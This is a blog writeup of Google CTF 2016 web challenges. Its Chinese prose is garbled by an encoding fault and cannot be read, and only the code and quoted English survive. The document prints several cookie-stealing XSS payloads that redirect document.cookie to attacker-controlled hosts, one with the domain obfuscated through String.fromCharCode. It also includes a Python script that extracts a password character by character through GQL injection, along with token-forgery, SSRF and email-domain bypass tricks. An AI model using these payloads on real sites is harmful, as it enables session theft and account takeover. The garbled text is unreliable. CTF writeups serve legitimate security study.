LoRexxar's Blog

google_ctf2016_writeup

2016/05/02

5鏈堜笉鍑忚偉锛6鏈堝緬鎮蹭激鈥︼紙鈺紞锛匡紞锛夆暞鈺р暓锛5鏈堢殑绗竴涓懆鏈氨鍝篃娌″幓锛屾墦浜唃oogle绗竴骞村姙鐨勬瘮璧涳紝鏁翠綋杩樺彲浠ワ紝灏辨槸鏈堝埌浜嗗緢澶氬鎬殑涓滆タ銆傘傘備篃涓嶇煡閬撴槸鎴戜滑鑴戞礊澶皬浜嗭紝杩樻槸璇磄oogle鐨勭▼搴忓憳浠涔堟礊閮藉啓杩囥傘傘

WEB

Wallowing Wallabies

棰樼洰鏄竴涓郴鍒楃殑xss棰樼洰锛屾湁瓒g殑鏄紝鏈寮濮嬪垰鍒氬紑濮嬬殑鏃跺欙紝杩欎釜棰樼洰涓嶆槸杩欐牱鐨勨﹀ソ鍍忔槸鎶婂彟涓棰樼殑鐜鎼簡杩囨潵锛岀粨鏋滃紑濮嬪氨璇浜嗗緢澶氥

https://wallowing-wallabies.ctfcompetition.com/

棣栧厛鏄彂鐜版湁robots.txt

1
2
3
4
5
6
7
8
9
User-agent: *
Disallow: /deep-blue-sea/
Disallow: /deep-blue-sea/team/
# Yes, these are alphabet puns :)
Disallow: /deep-blue-sea/team/characters HTTP:402
Disallow: /deep-blue-sea/team/paragraphs HTTP:403
Disallow: /deep-blue-sea/team/lines
Disallow: /deep-blue-sea/team/runes
Disallow: /deep-blue-sea/team/vendors

棣栧厛鍙戠幇鍙湁鏈鍚庝竴涓兘鎵撳紑锛岀劧鍚庨鐩彁绀鸿瑕亁ss鐩梒ookie锛屾墦寮鍙戠幇鏄釜缁欑鐞嗗憳鐨勭暀瑷鏉匡紝閭d箞灏辩煡閬撲簡锛屽紑濮嬪惂銆

Part One

绗竴棰樼殑xss鐪熺殑鏄瘮杈冩壇娣★紝棰樼洰瑕佹眰蹇呴』瑕佹湁

1
<script src

杩欐牱鐨勫紑澶淬傘傘傝繕娌¤杩囪繖鏍风殑瑕佹眰锛屽洜涓虹珯涓紑鍚簡CSP锛屾墍浠ワ紝杩欓噷鏄笉鑳界敤澶栬仈js鐨勶紝娌″叧绯伙紝閭e氨鍐嶅悗闈㈠啀鍔犱竴涓猻cript鏍囩鍚э紝娴嬭瘯涓嬪ソ鍍忓彂鐜扮鐞嗗憳涓嶈兘鍜屽閮ㄩ氫俊锛岄偅涔堜箙绮楁毚鐨勪娇鐢ㄤ簡璺宠浆鈥

1
<script src="/js/jquery-1.12.0.min.js"></script><script>window.location="http://xss.xxxx.cc?+cookie"+document.cookie</script>

鎵撳埌浜哻ookie锛屼絾鏄姳浜嗗緢涔呮墠鎵惧埌flag锛屾病鍔炴硶鈥﹂鎰忚涓嶆竻妤氣

1
green-mountains=eyJub25jZSI6IjA4ZjVhNzgxZWY3MTdjMjMiLCJhbGxvd2VkIjoiXi9kZWVwLWJsdWUtc2VhL3RlYW0vdmVuZG9ycy4qJCIsImV4cGlyeSI6MTQ2MTk5NTc1OX0=|1461995756|4feab5409a0f36bd685bc17473cc363699790e36

鍓嶉潰瑙ase64寰楀埌
'{"nonce":"08f5a781ef717c23","allowed":"^/deep-blue-sea/team/vendors.*$","expiry":1461995759}'
鎴戜滑鐪嬪埌vendors鍩熶笅寰楀埌浜哸llowed锛屽姞涓奵ookie鏌ョ湅杩欎釜椤甸潰鎴戜滑鐨勫埌flag锛岃繕寰楀埌浜嗕笅涓棰樼殑鍏ュ彛銆

Part Two

https://wallowing-wallabies.ctfcompetition.com/deep-blue-sea/team/vendors/msg

杩樻槸鐣欒█鏉匡紝閭d箞灏辫瘯楠屼笅鍚э紝绋嶅井娴嬭瘯涓嬪彂鐜板ソ鍍忔槸/鍚庝細琚繃婊わ紝alert浼氳杩囨护锛屽鏋渙n灞炴у悗闈㈡湁=鍙蜂細琚繃婊ゃ
鐢变簬/鍚庤杩囨护锛屾墍浠ユ病鍔炴硶闂悎<script>,璇曚簡涓涓嬭В鍐充笉浜嗭紝閭d箞涔呮崲鏍囩鍚р

1
2
3
<svg/onload
="
window.location='http://xss.xxx.cc?'+(document.cookie)">

杩欓噷涔熸槸韪╀簡澶у潙锛屼笉鐭ラ亾涓轰粈涔堬紝杩欓噷鐨刡oot涓鐩存寕锛屽鑷村緢涔呮墠鏀跺埌cookie锛屼絾鏄嵈娌℃敞鎰忓埌cookie鏈夊尯鍒紝绛変簡4銆5涓皬鏃舵墠鍙戠幇杩欎釜闂銆

1
green-mountains=eyJub25jZSI6ImUxZTM5ZjcxZTBkNTVjMDQiLCJhbGxvd2VkIjoiXi9kZWVwLWJsdWUtc2VhL3RlYW0vY2hhcmFjdGVycy4qJCIsImV4cGlyeSI6MTQ2MjAxNDM5MX0=|1462014388|0b51ee8a5986850cf11b119a6ddd447b277dc8e1

瑙d笅base64
'{"nonce":"e1e39f71e0d55c04","allowed":"^/deep-blue-sea/team/characters.*$","expiry":1462014391}'
鎴戜滑鐪嬪埌缁欎簡鍙︿竴涓煙涓嬬殑鏉冮檺銆傝闂甤haracter寰楀埌鍙︿竴涓猣lag

Part Three

铏界劧涓嶇煡閬撲负浠涔堢涓夐缁欎簡寰堥珮鐨勫垎鏁帮紝涓嶈繃鐪熺殑鏄姳浜嗗嚑鍒嗛挓灏卞仛鍑烘潵浜嗐傘傘

娴嬭瘯涓嬪彂鐜皌itle杩囨护姣旇緝寮憋紝鍙彂鐜颁竴涓繃婊わ紝灏辨槸.鐨勮繃婊わ紝棣栧厛鏄В鍐冲煙鍚嶇殑闂銆

String['fromCharCode'](120, 115, 115, 46, 108, 97, 122, 121, 115, 104, 101, 101, 112, 46, 99, 99)灏卞彲浠ュ緱鍒板煙鍚嶏紝鍏舵鏄痙ocument.cookie鐨勯棶棰橈紝ak鑿婅嫞鍛婅瘔鎴戯紝ducument鍙互褰撲綔涓涓暟缁勫鐞嗭紝涔熷氨鏄document['cookie']杩欐牱鐨勫彲浠ュ緱鍒癱ookie

payload

1
2
3
<script>location='http:///'+String['fromCharCode'](120, 115, 115, 46, 108, 97, 122, 121, 115, 104, 101, 101, 112, 46, 99, 99)+'/?'+document['cookie'];</script>
green-mountains=eyJub25jZSI6IjkyYmIyZWE5OWYwNTdiZDgiLCJhbGxvd2VkIjoiXi9kZWVwLWJsdWUtc2VhL3RlYW0vcGFyYWdyYXBoLiokIiwiZXhwaXJ5IjoxNDYyMDE5MjAxfQ==|1462019198|287dbcc084c610e2666ac995616137577bc4c05b

Ernst Echidna

娌″暐鍙互璇寸殑锛屾敞鍐屽彂鐜癱ookie鏄敤鎴峰悕鐨凪D5锛岄偅涔堟敼涓猘dmin鐨凪D5灏卞ソ浜

Spotted Quoll

棰樼洰鏄痯ython鐨勫簭鍒楀寲鍜屽弽搴忓垪鍖
浠栫粰鐨勮В寮鍚庡彂鐜皍ser閭i噷鏄疦one锛屾墍浠ヨˉ涓婁竴涓猘dmin锛実et

Purple Wombats

鎵撳紑鍙戠幇鏈夋簮鐮佹硠闇诧紝鐒惰屾渶鎵殑浜嬶紝杩欎釜鎻愮ず鏈寮濮嬫槸鍦ㄩ偅涓獂ss閭i閲岀殑

婧愮爜鍦板潃锛https://github.com/mannequin-moments/website

浣嗘槸鐧婚檰鍔熻兘琚叧闂簡锛岀劧鑰屾墦寮flag椤甸潰鍗存湁妫娴嬫槸鍚︾櫥闄嗙殑瑁呴グ鍣

1
2
3
4
5
6
7
def require_login(f):
@functools.wraps(f)
def wrapped(self, *args, **kwargs):
if not self.session.get('user'):
return webapp2.redirect('/login', response=self.response)
return f(self, *args, **kwargs)
return wrapped

鍙鏌ヤ簡session涓槸瀛樺湪username锛屽苟涓旂粰浜唖ecret_key锛屾湰鍦版惌寤簑ebapp2鐨勭幆澧冿紝鍦╯ession涓啓涓猽ser锛岀劧鍚庢妸session璐村洖绾夸笂鐜

get!

Dancing Dingoes

棰樼洰缁欎簡涓涓珯锛岀粰浜嗙敤鎴峰悕鍜屽瘑鐮侊紝瑕佸緱鍒癮dmin鏉冮檺锛屾垜浠壘浜嗗緢涔呴兘娌℃壘鍒帮紝鍚庢潵鍙戠幇鐧婚檰鏈変釜login锛焏omain=xxx杩欐牱鐨勶紝鏀规敼鍙戠幇鎶ラ敊浜嗐傛墦寮鐪嬬湅鍙戠幇鐢ㄦ埛淇℃伅鏄粠杩欓噷鑾峰緱鐨勶紝閭d箞鎴戜滑鍦ㄨ嚜宸辨湇鍔″櫒涓婃斁涓涓紝
userid : admin,鐒跺悗璇锋眰杩欓噷锛実etflag

Horton Hears a Who!

鎵撳紑鍙戠幇鏈夌櫥闄嗘敞鍐屾敞閿銆

娴嬭瘯浜嗗緢涔呭彂鐜皌oken鏍规湰灏辨槸瑙d笉鍑虹殑

1
2
3
4
5
6
7
8
dd1g:0:1462086430:MI80yZoF-STfaLEp1v124i2lsquULujTJJtM61Ug2tU=
ddog:0:1462086430:O3S-RHZ7dobbKnZ_MfpSKhUf-PqirpPr852fuQ4MZ9A=
de1g:0:1462086550:AD8-7rek9ltrhb8_iLuAQ3rEvsQG0akf7LUfJOxWCRo=
deog:0:1462086550:MucH660HSiXby0hKYzXo4a0YmNtZs_c2EQnsOky1d84=
ddog:0:1462086643:v98x98PtHScKlSyjHOlIhrqb8QIzBJ_Ljd1Cybp2V_M=
dd1g:0:1462086643:iB5EBvvZ9GbZv1rl4_XeUwhCf6xf7YRe9NNDmt0zpeE=

鐒跺悗灏卞純鐤椾簡锛屽悗鏉ョ粨鏉熺湅wp鎵嶇煡閬撱傘傝繖棰樻牴鏈笉鏄繖涔堝仛鐨勶紙鍐欏嚭杩欑娲炵殑绋嬪簭鍛樼畝鐩淬傘傘傦級

娉ㄥ唽涓涓悕涓admin:1:娌¤繃鏈熺殑鏃堕棿鎴杩欐牱鐨剈sername锛岀劧鍚庤В鍖呯殑鏃跺欏苟涓嶆槸瀹屽叏鎯充笉閫氭庝箞鍥炰簨灏辫В鎴愪簡admin鈥
admin:1:1462168888:0:1462168809:z7AtZXC4yJDtfiAihcQBFbGHyasFaiRZQJC3rvqtwo0=

鐒惰屽苟涓嶈兘鎯抽氫负浠涔堟垜褰撴椂鏋勯admin:1:鏃堕棿鎴:token灏变笉鑳借繃鍒ゆ柇(鍚庢潵瀛﹂暱鍛婅瘔鎴戯紝鏄牴鎹-1鍖归厤token锛岀劧鍚庡拰鍝堝笇鐨勫墠闈㈡瘮杈冿紝鐒跺悗鎵嶆湁杩欐牱鐨勬礊鈥)

Congratulations, your flag is: CTF{huh-i-didn鈥檛-know-you-could-do-that}

Flag Storage Service

鎵撳紑鐪嬬湅robots.txt
寰楀埌

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
User-agent: hackers
Disallow: /README.txt
Disallow: /sync
FlagService 0.01
README.txt
== Authentication ==
Authentication via username/password is the default. If another authentication
mechanism is configured, then the password field must *not* be sent to avoid
including it in the backend query. The default username is 'manager', but this
may be customized to suit your needs.
== Synchronization ==
In order to sync between multiple instances, there is a config page at
/sync that is only available to authorized applications that send the
appropriate X-FlagStore header. This header is automatically added
to all HTTP requests to partner instances.

鐪嬪埌wp
http://buer.haus/2016/05/01/google-ctf-web-11-flag-storage-service/

浣爐m鍛婅瘔鎴戯紝鍙戠幇杩欓鏄墠闈竴棰樼殑婧愮爜锛燂紵锛熻繖鑳界湅寰楀嚭鏉ワ紵锛燂紵

娴嬭瘯浜嗕笅鍙戠幇瀛樺湪gql娉ㄥ叆锛屼絾鏄痝ql娌℃湁or璇彞锛屾墍浠ュ紑濮嬫病鏈夋兂鍑烘潵鎬庝箞鍋氥

1
2
3
4
5
@classmethod
def Login(cls, username, password):
query = "SELECT * FROM User WHERE username = '%s'" % username
if password is not None:
query += " AND password = '%s'" % password

wp鐨勪綔鑰呰鑺变簡寰堜箙鍘荤湅gql鐨勬枃妗https://cloud.google.com/appengine/docs/python/datastore/gqlreference

鐒跺悗杩樻壘鍒颁簡涓涓湁瓒g殑涓滆タ
http://stackoverflow.com/questions/47786/google-app-engine-is-it-possible-to-do-a-gql-like-query

寰楀埌涓涓洸娉ㄧ殑鍙兘

1
username=manager鈥 AND password >=鈥橝鈥 AND password < 鈥Z

濡傛灉鍙戣繖鏍风殑璇锋眰锛屽緱鍒鈥淚nvalid password.鈥 (error 1)
娴嬭瘯鍒扳楧鈥欑殑鏃跺欏彂鐜版姤閿欏彉浜

1
When we hit 鈥淒鈥 we land on a different error: 鈥淚nvalid username/password.鈥 (error 2)

鏈変釜鑴氭湰

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
import random
import string
import pycurl
from io import BytesIO
import base64
import threading
def login(char):
global password
buffer = BytesIO()
host_url = 'https://next-bitter-flag.ctfcompetition.com/login'
c = pycurl.Curl()
c.setopt(c.URL, host_url)
c.setopt(pycurl.FOLLOWLOCATION, 1)
c.setopt(pycurl.SSL_VERIFYPEER, 0);
c.setopt(pycurl.COOKIEJAR, 'cookie.txt')
c.setopt(pycurl.COOKIEFILE, 'cookie.txt')
c.setopt(pycurl.POST, 1)
c.setopt(pycurl.POSTFIELDS, "username=manager' AND password >='"+password+""+char+"' AND password < 'z")
c.setopt(c.WRITEDATA, buffer)
c.perform()
c.close()
body = buffer.getvalue()
return body
password = "C"
def getNextChar():
char_min=33
char_max=126
for x in range(char_min, char_max):
char = chr(x)
body = login(char)
if "Invalid username/password." in body:
return chr((x-1))
return False
while True:
password+=getNextChar()
print(password)
print "end"

FSS 鈥 Electric Boogaloo

http://buer.haus/2016/05/01/google-ctf-web-12-fss-electric-boogaloo/

杩欐槸涓婁竴棰榝lag storage鐨勪笅涓棰橈紝鐢ㄧ涓棰樺緱鍒扮殑鐢ㄦ埛鍚嶅瘑鐮佺櫥闄

鎴戜滑鍙戠幇鏃犳硶璁块棶/sync椤甸潰锛屽彲鑳芥槸鍥犱负娌℃湁涓涓湁鏁堢殑澶X-FlagStore

鐧婚檰鍚庡彂鐜皃rofile鍙兘瀛樺湪涓浜涢棶棰樸
鍘熸枃鏄繖涔堣鐨

1
There鈥檚 a form for uploading GnuPG keys based on a remote URL. The immediate thing that jumps to mind is Server-Side Request Forgery. I tried to put my own website in this input and sure enough, it loaded the contents of my website and displayed it back. I put the /sync endpoint into the input and got the following:

GnuPG keys瀛樺湪闂锛屼粬浼氳鍙栨墍璇锋眰鐨勬簮鐮侊紝閭d箞鎴戜滑璁╀粬鍘昏/sync,get flag

Weedy Sea Dragon

棰樼洰璇
It鈥檚 feared that their authentication and authorization check is implemented wrongly.

鎵撳紑缃戦〉浼氳嚜鍔ㄧ敤 Google 甯愬彿鐧诲綍锛岀劧鍚庡憡璇変綘浣犳病鏈夋潈闄愯闂

鎻愮ず锛
Access to this service is restricted to @ctfcompetition.com accounts only.
Access from gmail.com accounts is prohibited

澶ф鎰忔濆氨鏄渶瑕佷粠ctfcompetiion.com鏉ユ簮鎵嶈兘鐪嬪埌
杩欏悗闈㈡槸鐪嬩簡杩欎釜浜虹殑wphttp://blog.eqoe.cn/posts/google-ctf-2016-part2.html

鐚滄祴鍒ゆ柇閭欢鍦板潃鏄氳繃鍖呭惈鑰屼笉鏄啓姝荤殑锛岄偅涔
鎴戜滑鎵撳紑鍩熷悕绠$悊锛屾柊澧炰竴涓 ctfcompetition.com.yourdomain 鐨 MX 璁板綍锛屽湪鏈嶅姟鍣ㄤ笂鐩戝惉 25 绔彛銆

鐢 ctfcompetition.com@ctfcompetition.com.yourdomain 娉ㄥ唽涓涓柊鐨 Google 甯愬彿锛岀劧鍚庡啀鐧诲綍鐩爣椤甸潰锛屽嵆鍙幏寰 Flag銆

鈥.

Global CTF

鎻忚堪
Can you break into this CTF website? Features Two Factor Authentication for unbeatable security.

杩欓噷鏄湅浜嗚繖绡噖p锛岃嚜宸卞苟娌℃湁鍋氬嚭鏉モ
http://buer.haus/2016/05/01/google-ctf-web-8-global-ctf/

鏈夎叮鐨勬槸锛岃繖棰樼湡鐨勬槸涓涓猚tf骞冲彴https://github.com/Nakiami/mellivora
涔熷氨鏄鎵峠oogle鐨勯鐩噷鍙堟湁涓涓猚tf骞冲彴

鎸夌収浣滆呯殑鎰忔濓紝浠栧湪鏈湴鎼缓浜嗕竴涓钩鍙帮紝涓涓〉闈竴涓〉闈㈢殑鎵撅紝浣嗘槸骞舵病鏈夋壘鍒颁粈涔堥棶棰橈紙鍜屾垜浠竴鏍凤級
浣嗘槸鈥
Nothing interesting. So I move on and eventually click on my Profile page.

I鈥檓 all of a sudden logged in as the admin and there is the flag:


浠栨祴璇曞悗鍙戠幇濡傛灉浣犵敤/recruit杩欓噷鐨勮姹傛敼鍙樹綘鐨勭敤鎴穝ession锛屼綘灏卞彲浠ョ櫥闄嗕笂涓嶅悓鐨勭敤鎴封

1
2
3
I created a new account and walked through the steps again to verify. Indeed, any time you use the /recruit request you change your current user session logging you into a different account.
I鈥檒l have to revisit this later because it doesn鈥檛 seem like the intended solution or I missed something obvious.

鈥﹀ソ鍚р

Geokitties

Blast from the past. Prepare to enter a world of early 90鈥檚 HTML, complete with background music. Visit GeoKitties today!

棰樼洰娌$湅锛屼笉杩囨壘鍒颁竴涓獁p锛岃

1
'post_id=1&comment=<a href="javascript:location=\'http://domain/\'%2bdocument.cookie" onclick="">'

networking

杩欐google閬囧埌浜嗕竴绫绘病瑙佽繃鐨勯鐩紝鍙玭etworking锛岄槦閲屾病浜轰細鍋氥傘傘傝创涓婂ぇ绁炵殑wp锛屼互鍚庡涔

http://blog.eqoe.cn/posts/google-ctf-2016-part1.html

CATALOG
  1. 1. WEB
    1. 1.1. Wallowing Wallabies
      1. 1.1.1. Part One
      2. 1.1.2. Part Two
      3. 1.1.3. Part Three
    2. 1.2. Ernst Echidna
    3. 1.3. Spotted Quoll
    4. 1.4. Purple Wombats
    5. 1.5. Dancing Dingoes
    6. 1.6. Horton Hears a Who!
    7. 1.7. Flag Storage Service
    8. 1.8. FSS 鈥 Electric Boogaloo
    9. 1.9. Weedy Sea Dragon
    10. 1.10. Global CTF
    11. 1.11. Geokitties
  2. 2. networking